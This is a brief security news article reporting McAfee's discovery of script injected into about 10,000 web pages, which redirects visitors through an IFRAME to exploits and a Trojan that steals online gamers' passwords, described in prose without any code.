McAfee has uncovered a script injection attack on some 10,000 Web pages, apparently designed to help attackers steal passwords from online gamers.
"This attack involves injection of script into valid Web page to include a reference to a malicious .JS file (sometimes in the body, other times in the title section)," said McAfee's Avert Labs in a blog. "The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several [existing] vulnerabilities."
"This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another," McAfee said. "At least one of the payload Trojans targets online gamers."
The attack appears to emanate from China, according to McAfee.
The approach is similar to the attack that hit the Miami Dolphins and Dolphins Stadium before the Super Bowl, McAfee says. The Web pages appear to be unaltered, but the attackers inject a small amount of code that redirects the browser to a malicious site.
The site then loads a password-stealing Trojan on the user's machine that can find passwords to popular online games, McAfee says.
Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.